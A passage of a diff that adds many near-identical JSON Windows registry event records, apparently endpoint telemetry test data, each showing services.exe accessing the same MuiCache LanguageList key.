"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 